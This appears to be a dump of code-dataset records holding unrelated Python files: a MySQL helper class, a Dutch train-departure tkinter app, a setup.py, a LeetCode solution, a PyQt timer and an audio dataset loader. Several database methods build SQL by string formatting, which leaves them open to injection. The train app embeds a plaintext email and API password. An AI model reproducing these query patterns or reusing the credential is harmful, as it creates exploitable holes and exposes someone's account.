all_rows\n\n def get_column(self, tablename: str, column: str) -> List[Any]:\n \"\"\"\n Retrieves the values of a specific column from the specified table in the connected MySQL database.\n\n :param tablename: The name of the table from which to retrieve the column.\n :param column: The name of the column to retrieve.\n :return: A list of values representing the specified column.\n :raises Exception: If there is an error in retrieving the column.\n \"\"\"\n with self.cursor() as cursor:\n query = f\"SELECT `{column}` FROM `{tablename}`\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n db_data = cursor.fetchall()\n all_rows = list(tuple(zip(*db_data))[0])\n return all_rows\n\n def get_rows_from_columns(self, tablename: str, **cols) -> List[Tuple]:\n \"\"\"\n Retrieves specific columns from all rows of the specified table in the connected MySQL database.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :param cols: Keyword argument containing the \"columns\" key with a list of column names to retrieve.\n :return: A list of rows, where each row is represented as a tuple containing the specified columns.\n \"\"\"\n with self.cursor() as cursor:\n columns = ', '.join([f\"`{col}`\" for col in cols.get(\"columns\", [])])\n query = f\"SELECT {columns} FROM `{tablename}`\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n all_rows = cursor.fetchall()\n return all_rows\n\n def get_rowss_from_columns_by_key(self, tablename: str, key: str, value: Any, **cols) -> List[Tuple]:\n \"\"\"\n Retrieves specific columns from the rows of the specified table in the connected MySQL database, filtered by a key-value pair.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :param key: The column name used as a key to filter the rows.\n :param value: The value corresponding to the key used to filter the rows.\n :param cols: Keyword argument containing the \"columns\" key with a list of column names to retrieve.\n :return: A list of rows, where each row is represented as a tuple containing the specified columns and matching the key-value pair.\n \"\"\"\n with self.cursor() as cursor:\n columns = ', '.join([f\"`{col}`\" for col in cols.get(\"columns\", [])])\n query = f\"SELECT {columns} FROM `{tablename}` WHERE `{key}` = %s\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (value,))\n all_rows = cursor.fetchall()\n return all_rows\n\n def get_rows_from_columns_by_key(self, tablename: str, key: str, value: Any) -> List[Tuple]:\n \"\"\"\n Retrieves all columns from the rows of the specified table in the connected MySQL database, filtered by a key-value pair.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :param key: The column name used as a key to filter the rows.\n :param value: The value corresponding to the key used to filter the rows.\n :return: A list of rows, where each row is represented as a tuple containing all columns and matching the key-value pair.\n \"\"\"\n with self.cursor() as cursor:\n query = f\"SELECT * FROM `{tablename}` WHERE `{key}` = %s\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (value,))\n all_rows = cursor.fetchall()\n return all_rows\n\n def get_rows_from_columns_by_foregin_id(self, tablename: str, foregincolumn: str, foreginidx: Any, **cols) -> Union[List[Any], int]:\n \"\"\"\n Retrieves specific columns from the rows of the specified table in the connected MySQL database, filtered by a foreign key index.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :param foreigncolumn: The name of the foreign key column used for filtering.\n :param foreignidx: The foreign key index value used for filtering.\n :param cols: Keyword argument containing the \"columns\" key with a list or string representing the column names to retrieve.\n :return: A list of rows matching the foreign key filter, or 0 if an error occurs.\n :raises Error: If there is an error in executing the query.\n :raises TypeError: If no results are found.\n \"\"\"\n with self.cursor() as cursor:\n if not isinstance(cols.get(\"columns\"), str):\n columns = ','.join(map(str, cols.get(\"columns\")))\n else:\n columns = cols.get(\"columns\")\n query = \"SELECT {1:s} FROM {0:s} WHERE {2:s} = {3!r};\".format(tablename, columns, foregincolumn, str(foreginidx))\n\n try:\n cursor.execute(query)\n LOG.debug(\"EXECUTING: %s\", query)\n if len(cols.get(\"columns\"))==1 or isinstance(cols.get(\"columns\"), str):\n all_rows = [i[0] for i in cursor.fetchall()]\n else:\n\n all_rows =cursor.fetchall()\n return all_rows\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n except TypeError as err:\n LOG.debug(\"No results found %s\", err)\n return 0\n else:\n return 1\n\n def get_row_by_id(self, tablename: str, idx: Any) -> Union[Tuple, None]:\n \"\"\"\n Retrieves a single row from the specified table in the connected MySQL database, filtered by a specific index.\n\n :param tablename: The name of the table from which to retrieve the row.\n :param idx: The index value used to identify the specific row.\n :return: A tuple representing the single row matching the index, or None if not found.\n \"\"\"\n with self.cursor() as cursor:\n query1 = \"SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_NAME` = {0!r}) AND (`COLUMN_KEY` = 'PRI');\".format(tablename)\n LOG.debug(\"EXECUTING: %s\", query1)\n cursor.execute(query1)\n columnID = cursor.fetchone()[0]\n query2 = \"SELECT * FROM {0:s} WHERE {1:s} = {2!r};\".format(tablename, columnID, str(idx))\n LOG.debug(\"EXECUTING: %s\", query2)\n cursor.execute(query2)\n single_row = cursor.fetchone()\n return single_row\n\n def get_value_id(self, tablename: str, column: str, value: Any) -> Union[int, None]:\n \"\"\"\n Checks whether a specific value exists in the specified table and column in the connected MySQL database and retrieves the corresponding ID.\n\n :param tablename: The name of the table in which to check for the value.\n :param column: The name of the column in which to check for the value.\n :param value: The value to search for in the specified table and column.\n :return: The ID corresponding to the value if found, None if not found, or 0 if an error occurs.\n :raises Error: If there is an error in executing the query.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT @id:={3:s} AS id FROM {0:s} WHERE {1:s} = {2!r}\".format(tablename, column, value, self.get_primary_key(tablename))\n LOG.debug(\"EXECUTING: %s\", query)\n try:\n cursor.execute(query)\n get_query = cursor.fetchone()\n value_id = get_query[0] if get_query != None else None\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n else:\n return value_id\n\n def get_value_id_multiple(self, tablename: str, **colvals) -> Union[int, None]:\n \"\"\"\n Retrieves the value ID by comparing multiple entries in the specified table in the connected MySQL database.\n\n :param tablename: The name of the table in which to check for the values.\n :param colvals: Keyword argument containing the \"columns\" key with a list of column names and the \"values\" key with a corresponding list of values.\n :return: The ID corresponding to the matched columns and values if found, None if not found, or -1 if an error occurs.\n :raises Error: If there is an error in executing the query.\n \"\"\"\n with self.cursor() as cursor:\n columns = colvals.get(\"columns\")\n values = colvals.get(\"values\")\n keys = zip(columns, values)\n\n query = \"SELECT @id:={0:s} AS id FROM {1:s} WHERE\".format(self.get_primary_key(tablename), tablename)\n\n elements = (len(columns))\n for i, (key, value) in enumerate(keys):\n query += \" {0:s} = {1!r} \".format(key, value)\n query += \"AND\" if i Union[Any, int]:\n \"\"\"\n Retrieves a specific value from the specified table and column in the connected MySQL database, filtered by the primary key index.\n\n :param tablename: The name of the table from which to retrieve the value.\n :param column: The name of the column from which to retrieve the value.\n :param idx: The primary key index value used to identify the specific row.\n :return: The value corresponding to the specified column and index, or 0 if an error occurs, or 1 if no TypeError occurs.\n :raises Error: If there is an error in executing the query.\n :raises TypeError: If no results are found.\n \"\"\"\n with self.cursor() as cursor:\n query1 = \"SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_NAME` = {0!r}) AND (`COLUMN_KEY` = 'PRI');\".format(tablename)\n LOG.debug(\"EXECUTING: %s\", query1)\n\n try:\n cursor.execute(query1)\n columnID = cursor.fetchone()[0]\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n\n query2 = \"SELECT {1:s} FROM {0:s} WHERE {2:s} = {3!r};\".format(tablename, column, columnID, str(idx))\n LOG.debug(\"EXECUTING: %s\", query2)\n\n try:\n cursor.execute(query2)\n single_row = cursor.fetchone()[0]\n return single_row\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return 0\n except TypeError as err:\n LOG.debug(\"No results found %s\", err)\n return 0\n else:\n return 1\n\n\n def value_exists(self, tablename: str, column: str, value: Any) -> int:\n \"\"\"\n Checks whether a specific value exists in the specified table and column in the connected MySQL database.\n\n :param tablename: The name of the table in which to check for the value.\n :param column: The name of the column in which to check for the value.\n :param value: The value to search for in the specified table and column.\n :return: The number of rows found with the specified value in the specified table and column.\n \"\"\"\n query = f\"SELECT `{column}`, COUNT(*) FROM `{tablename}` WHERE `{column}` = %s GROUP BY `{column}`\"\n LOG.debug(\"EXECUTING: %s\", query)\n with self.cursor() as cursor:\n cursor.execute(query, (value,))\n result = cursor.fetchone()\n number_of_rows_found = result[1] if result else 0\n return number_of_rows_found\n\n\n def value_exists_multiple(self, tablename, **colvals):\n \"\"\"\n Checks whether specific values exist in the specified table and columns in the connected MySQL database.\n\n :param tablename: The name of the table in which to check for the values.\n :param colvals: Keyword argument containing the \"columns\" key with a list of column names and the \"values\" key with a corresponding list of values.\n :return: The number of rows found with the specified values in the specified table and columns, or 0 if an error occurs or no results are found.\n :raises Error: If there is an error in executing the query.\n :raises TypeError: If no results are found.\n \"\"\"\n with self.cursor() as cursor:\n\n columns = colvals.get(\"columns\")\n values = colvals.get(\"values\")\n keys = zip(columns, values)\n query = \"SELECT {1:s}, COUNT(*) FROM {0:s} WHERE\".format(tablename, columns[0])\n\n elements = (len(columns))\n if elements > 1:\n for i, (key, value) in enumerate(keys):\n query += \" {0:s} = {1!r} \".format(key, value)\n query += \"AND\" if i', on_configure)\r\n\r\n frame3 = tk.Frame(canvas)\r\n frame3.configure(background=\"#ffc61e\")\r\n\r\n canvas.create_window((0, 0), window=frame3, anchor='nw')\r\n\r\n # knoppen---------------------------------------------------------------------------------------\r\n # hier staat de code voor de knoppen om het desbetrefende station te zoeken\r\n # en terug te gaan naar het startscherm.\r\n\r\n menu = tk.Frame(self)\r\n menu.configure(background=\"#ffc61e\")\r\n menu.pack(side=tk.TOP, expand=tk.FALSE, fill=\"x\", padx=50)\r\n\r\n invoer = tk.Entry(menu, background=\"#ffc61e\")\r\n invoer.pack(side=tk.LEFT)\r\n invoer.insert(0, \"Utrecht\")\r\n\r\n run = tk.Button(menu, text=\"vind\", font=(\"Arial\", 22, \"bold\"), foreground=\"white\", background=\"#00337f\",\r\n command=lambda: station(invoer, frame3))\r\n run.pack(side=tk.LEFT)\r\n\r\n terug = tk.Button(menu, text=\"terug\", font=(\"Arial\", 22, \"bold\"), foreground=\"white\", background=\"#00337f\",\r\n command=lambda: (controller.show_frame(\"StartPage\"), invoer.delete(0, 'end'),\r\n invoer.insert(0, \"Utrecht\"), station(invoer, frame3)))\r\n terug.pack(side=tk.RIGHT)\r\n\r\n # logo van de NS (LET OP! zet NSlogoklein.png in dezelfde map als dit python bestand)\r\n # de achtergrond van NS is blauw == #00337f en geel == #ffc61e\r\n photo_image_2 = tk.PhotoImage(file=\"NSlogoklein.png\")\r\n photo_label_2 = tk.Label(self, image=photo_image_2, width=220, height=80)\r\n photo_label_2.image = photo_image_2\r\n photo_label_2.pack(side=tk.BOTTOM, anchor=\"e\", padx=10, pady=10)\r\n\r\n station(invoer, frame3)\r\n\r\n# zonder een parameter (event) werkt de scrollbar niet\r\n# deze functie zorgt dat de grootte van de canvas wordt doorgegeven aan de scrollbar\r\n\r\n# Canvas is een globale variabele omdat\r\n# de functie \"on_configure\" geen variabele kan ontvangen\r\n\r\n\r\ndef on_configure(event):\r\n global canvas\r\n canvas.configure(scrollregion=canvas.bbox('all'))\r\n\r\n\r\n# haalt het opgegeven station uit de entry\r\n\r\ndef station(invoer, frame):\r\n plek = invoer.get()\r\n connect_and_print(plek, frame)\r\n\r\n\r\ndef connect_and_print(plek, frame):\r\n for widget in frame.winfo_children():\r\n widget.destroy()\r\n\r\n link = 'http://webservices.ns.nl/ns-api-avt?station=' + plek\r\n user = 'akiikimel@gmail.com'\r\n wachtwoord = 'h8YWmp9c23L0VovKZxa8AvWJMf6sotmcoTy8K75m0PSIGMaG6_KoJA'\r\n\r\n response = requests.get(link, auth=(user, wachtwoord)) # logt in en haalt de api op\r\n vertrekxml = xmltodict.parse(response.text)\r\n\r\n # deze regels zorgen voor een header voor de informatie\r\n tekst_set_1 = tk.Label(frame, text=\"| vertrektijd\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_2 = tk.Label(frame, text=\"| eindbestemming\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_3 = tk.Label(frame, text=\"| via\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_4 = tk.Label(frame, text=\"| spoor\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_5 = tk.Label(frame, text=\"| type\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_6 = tk.Label(frame, text=\"| vertraging\", background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_7 = tk.Label(frame, text=\"| rit\", background=\"#ffc61e\", font=\"bold\")\r\n\r\n tekst_set_1.grid(row=0, column=0, sticky=tk.W)\r\n tekst_set_2.grid(row=0, column=1, sticky=tk.W)\r\n tekst_set_3.grid(row=0, column=2, sticky=tk.W)\r\n tekst_set_4.grid(row=0, column=3, sticky=tk.W)\r\n tekst_set_5.grid(row=0, column=4, sticky=tk.W)\r\n tekst_set_6.grid(row=0, column=5, sticky=tk.W)\r\n tekst_set_7.grid(row=0, column=6, sticky=tk.W)\r\n\r\n # hieronder leest hij de api uit en brengt de info naar het scherm\r\n rij = 1\r\n try:\r\n for vertrek in vertrekxml['ActueleVertrekTijden']['VertrekkendeTrein']:\r\n\r\n eindbestemming = vertrek['EindBestemming']\r\n try:\r\n spoor = vertrek[\"VertrekSpoor\"][\"#text\"]\r\n except KeyError:\r\n spoor = \"Nvt\"\r\n soort = vertrek[\"TreinSoort\"]\r\n rit = vertrek[\"RitNummer\"]\r\n try:\r\n via = vertrek[\"RouteTekst\"]\r\n except KeyError:\r\n via = \"Nvt\"\r\n\r\n try:\r\n vertraging = vertrek[\"VertrekVertragingTekst\"]\r\n except KeyError:\r\n vertraging = \" \"\r\n vertrektijd = vertrek['VertrekTijd'] # 2016-09-27T18:36:00+0200\r\n vertrektijd = vertrektijd[11:16] # 18:36\r\n\r\n tekst_set_1 = tk.Label(frame, text=\"| \" + vertrektijd, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_2 = tk.Label(frame, text=\"| \" + eindbestemming, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_3 = tk.Label(frame, text=\"| \" + via, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_4 = tk.Label(frame, text=\"| \" + spoor, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_5 = tk.Label(frame, text=\"| \" + soort, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_6 = tk.Label(frame, text=\"| \" + vertraging, background=\"#ffc61e\", font=\"bold\")\r\n tekst_set_7 = tk.Label(frame, text=\"| \" + rit, background=\"#ffc61e\", font=\"bold\")\r\n\r\n tekst_set_1.grid(row=rij, column=0, sticky=tk.W)\r\n tekst_set_2.grid(row=rij, column=1, sticky=tk.W)\r\n tekst_set_3.grid(row=rij, column=2, sticky=tk.W)\r\n tekst_set_4.grid(row=rij, column=3, sticky=tk.W)\r\n tekst_set_5.grid(row=rij, column=4, sticky=tk.W)\r\n tekst_set_6.grid(row=rij, column=5, sticky=tk.W)\r\n tekst_set_7.grid(row=rij, column=6, sticky=tk.W)\r\n\r\n rij += 1\r\n except KeyError:\r\n error_message = \"Geef een geldig station op.\"\r\n error_set_1 = tk.Label(frame, text=error_message, background=\"#ffc61e\", font=\"bold\")\r\n error_set_1.grid(row=1, column=0, columnspan=5, sticky=tk.W)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = Program()\r\n app.mainloop()\r\n", "repo_name": "freekgj/Miniproject-programming", "sub_path": "ns_vertrektijden1.py", "file_name": "ns_vertrektijden1.py", "file_ext": "py", "file_size_in_byte": 9518, "program_lang": "python", "lang": "nl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Tk", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.__init__", "line_number": 9, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 13, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tkinter.Frame.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 42, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.SUNKEN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "tkinter.TRUE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tkinter.TRUE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tkinter.BOTTOM", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tkinter.BOTH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tkinter.X", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tkinter.PhotoImage", "line_number": 61, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 62, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tkinter.Frame.__init__", "line_number": 70, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.SUNKEN", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tkinter.BOTTOM", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tkinter.BOTH", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tkinter.Canvas", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tkinter.TRUE", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tkinter.Scrollbar", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 88, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 97, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.FALSE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.Entry", "line_number": 101, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 105, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 107, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 109, "usage_type": "call"}, {"api_name": "tkinter.RIGHT", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tkinter.PhotoImage", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 117, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 119, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 150, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 154, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 156, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 157, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 159, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 160, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 162, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 163, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 164, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 167, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 194, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 195, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 196, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 197, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 198, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 199, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 200, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 202, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 203, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 204, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 205, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 206, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 207, "usage_type": "attribute"}, {"api_name": "tkinter.W", "line_number": 208, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 213, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 214, "usage_type": "attribute"}]}
+{"seq_id": "22310167299", "text": "# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nREQUIRES = [\n 'Werkzeug >= 0.6',\n 'Jinja2 >= 2.5',\n 'SQLAlchemy >= 0.6.1',\n 'pytz >= 2011a',\n 'Babel >= 0.9.4',\n 'lxml >= 2.0',\n 'sqlalchemy-migrate >= 0.6.1',\n 'html5lib >= 0.90',\n 'setuptools',\n ]\n\ntry:\n import json\nexcept ImportError:\n REQUIRES.append('simplejson')\n\nsetup(\n name='Rezine',\n version='0.3a2',\n url='https://github.com/rockyburt/Rezine',\n license='BSD',\n author='Rocky Burt',\n author_email='rocky@serverzen.com',\n description='A WSGI-based weblog engine in Python',\n long_description=open('README.rst').read() + '\\n\\n' \\\n + open('CHANGES.rst').read(),\n zip_safe=False,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary',\n ],\n packages=find_packages(),\n install_requires=REQUIRES,\n entry_points={\n 'console_scripts': [\n 'rezine-manage = rezine.manage:main'\n ],\n },\n platforms='any',\n include_package_data=True,\n test_suite='rezine.tests.test_suite',\n)\n", "repo_name": "rockyburt/Rezine", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1375, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "35512108909", "text": "# Given an integer array nums and two integers k and t, return true if there are two distinct indices i and j in the array \n# such that abs(nums[i] - nums[j]) <= t and abs(i - j) <= k.\nfrom bisect import bisect_left,bisect_right\nfrom sortedcontainers import SortedList\ndef containsNearbyAlmostDuplicate(nums, k, t):\n if t==0 and len(set(nums))==len(nums):\n return False\n if k<0 and t<0:\n return False\n s=SortedList()\n for i,n in enumerate(nums):\n if i>k:s.remove(nums[i-k-1])\n pos1=bisect_left(s,n-t)\n pos2=bisect_right(s,n+t)\n if pos1 != pos2:return True\n s.add(n)\n \n return False\nnums=[1,5,9,1,5,9]\nk=2\nt=3\nprint(containsNearbyAlmostDuplicate(nums,k,t))\n", "repo_name": "AbhinavSingh111/HackerRank-DS", "sub_path": "contains_duplicate2_l|letcode.py", "file_name": "contains_duplicate2_l|letcode.py", "file_ext": "py", "file_size_in_byte": 727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sortedcontainers.SortedList", "line_number": 10, "usage_type": "call"}, {"api_name": "bisect.bisect_left", "line_number": 13, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "28478049468", "text": "import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow\r\nfrom project_main_page import Ui_MainWindow\r\nimport time\r\nfrom PyQt5.QtCore import QTime, QTimer\r\n\r\n\r\nclass Main_Page(QMainWindow, Ui_MainWindow, QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.setGeometry(300, 100, 800, 600)\r\n self.Pause.clicked.connect(self.runTime)\r\n\r\n def runTime(self):\r\n self.time1 = QTime(0, 0, 10)\r\n self.timer = QTimer(self)\r\n self.timer.timeout.connect(self.showTime)\r\n self.timer.start(1000) \r\n self.showTime()\r\n\r\n def showTime(self):\r\n if self.time1.hour() == 0 and self.time1.minute() == 0 and self.time1.second() == 0:\r\n self.timer.stop() \r\n text = self.time1.toString('hh:mm:ss')\r\n if (self.time1.second() % 2) != 0:\r\n text = text[:2] + ' ' + text[3:5] + ' ' + text[6:]\r\n self.time1 = self.time1.addSecs(-1)\r\n self.Time.display(text)\r\n\r\n \r\napp = QApplication(sys.argv)\r\nex = Main_Page()\r\nex.show()\r\nsys.exit(app.exec_())\r\n", "repo_name": "TitanicFurball/Qt_Project", "sub_path": "project_1_updated.py", "file_name": "project_1_updated.py", "file_ext": "py", "file_size_in_byte": 1114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 8, "usage_type": "name"}, {"api_name": "project_main_page.Ui_MainWindow", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTime", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 32, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "72584396967", "text": "import torch\nfrom torch.utils.data import Dataset\nimport soundfile as sf\nimport numpy as np\nfrom librosa.feature import melspectrogram\nfrom tqdm import tqdm\nimport os\nimport random\n\nclass ESC10Dataset(Dataset):\n int_to_label = {0:'fire_cracking', 1:'dog_bark', 2:'rain', 3:'sea_waves', 4:'baby_cry',\n 5:'clock_tick', 6:'person_sneeze', 7:'helicopter', 8:'chainsaw', 9:'rooster'\n }\n\n def __init__(self, \n path, \n split, \n feature='waveform',\n mel_normalize=True,\n transform=None,\n target_transform=None,\n transforms=None,\n ):\n super().__init__()\n assert split in ['train', 'val']\n assert feature in ['waveform', 'mel']\n\n self.path = os.path.join(path, split)\n self.split = split\n self.feature = feature\n self.mel_normalize = mel_normalize\n self.num_samples = 220500 # hardcoded\n\n self.audio_files = {}\n\n for i in range(10):\n self.audio_files[i] = []\n\n for i, subdir in enumerate(\n ['010 - Fire crackling', '001 - Dog bark', '002 - Rain', '003 - Sea waves', \n '004 - Baby cry', '005 - Clock tick', '006 - Person sneeze', '007 - Helicopter', \n '008 - Chainsaw', '009 - Rooster'\n ]\n ):\n for f in os.listdir(os.path.join(self.path, subdir)):\n ext = os.path.splitext(f)[-1].lower()\n if ext != '.ogg':\n continue\n else:\n self.audio_files[i].append(os.path.join(self.path, subdir, f))\n\n def _2D_normalize(self, spectrogram):\n return spectrogram / np.max(spectrogram)\n\n def _pad_or_remove(self, audio):\n length = len(audio)\n if length == self.num_samples:\n return audio\n elif length > self.num_samples:\n return audio[:self.num_samples]\n else:\n delta = self.num_samples - length\n delta = self.num_samples - length\n return np.pad(audio, (0, delta), 'constant')\n\n def __len__(self):\n if self.split == 'train':\n return 300\n elif self.split == 'val':\n return 100\n\n def __getitem__(self, idx: int):\n if self.split == 'train':\n label = idx // 30\n audio_idx = idx % 30\n elif self.split == 'val':\n label = idx // 10\n audio_idx = idx % 10\n \n filename = self.audio_files[label][audio_idx]\n audio, sr = sf.read(filename)\n\n if self.feature == 'waveform':\n audio = self._pad_or_remove(audio)\n return torch.tensor(audio), label\n\n elif self.feature == 'mel':\n audio = self._pad_or_remove(audio)\n spectrogram = melspectrogram(y=audio, sr=sr, power=1)\n if self.mel_normalize:\n spectrogram = self._2D_normalize(spectrogram)\n return torch.FloatTensor(spectrogram), label\n\nclass ESC10ExposureGenerator(Dataset):\n int_to_subdir = {0:'010 - Fire crackling', 1:'001 - Dog bark', 2:'002 - Rain', 3:'003 - Sea waves', 4:'004 - Baby cry',\n 5:'005 - Clock tick', 6:'006 - Person sneeze', 7:'007 - Helicopter', 8:'008 - Chainsaw', 9:'009 - Rooster'\n }\n\n class ESC10InitialClasses(Dataset):\n def __init__(self,\n files,\n labels,\n feature='waveform',\n mel_normalize=True,\n ):\n super().__init__()\n assert feature in ['waveform', 'mel']\n\n self.files = 